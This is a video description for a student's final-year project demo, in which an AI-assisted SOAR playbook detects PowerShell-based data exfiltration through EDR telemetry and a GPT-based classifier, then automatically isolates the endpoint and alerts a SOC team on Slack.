Data Exfiltration Playbook Demo (PowerShell.exe) | AI-Powered SOAR
AI-Powered SOAR | Data Exfiltration Playbook Demo (PowerShell.exe)
In this video, I demonstrate the Data Exfiltration stage of my Final Year Project, where an attacker abuses PowerShell.exe to transfer sensitive data from the system to a remote server.
The system detects this activity using LimaCharlie EDR, which monitors suspicious process execution and outbound network connections. The event is then analysed using an AI-based model (GPT-powered decision engine) to determine whether the behaviour indicates data exfiltration or normal activity.
Once confirmed as a threat, the playbook automatically executes a response by isolating the endpoint, preventing further data leakage, and sends an alert via Slack to notify the SOC team.
⚡Key Highlights:
Detection of PowerShell-based data exfiltration
AI-based behavioural analysis and risk scoring
Monitoring of outbound data transfer activity
Automated endpoint isolation to prevent data loss
Reduced MTTR with no manual intervention
🎯 This playbook is part of my project:
“Evaluating the Effectiveness of AI-Powered SOAR Workflows in Reducing Incident Response Time and Analyst Workload.”
💡 The goal is to detect and stop sensitive data leakage in real time, ensuring strong data protection through intelligent automation.
#CyberSecurity #SOAR #SOC #EDR #Automation #AI #DataExfiltration #PowerShell #ThreatDetection #BlueTeam #Limacharlie #tines #openai
@TinesHQ
@OpenAI
For more information contact: [email protected]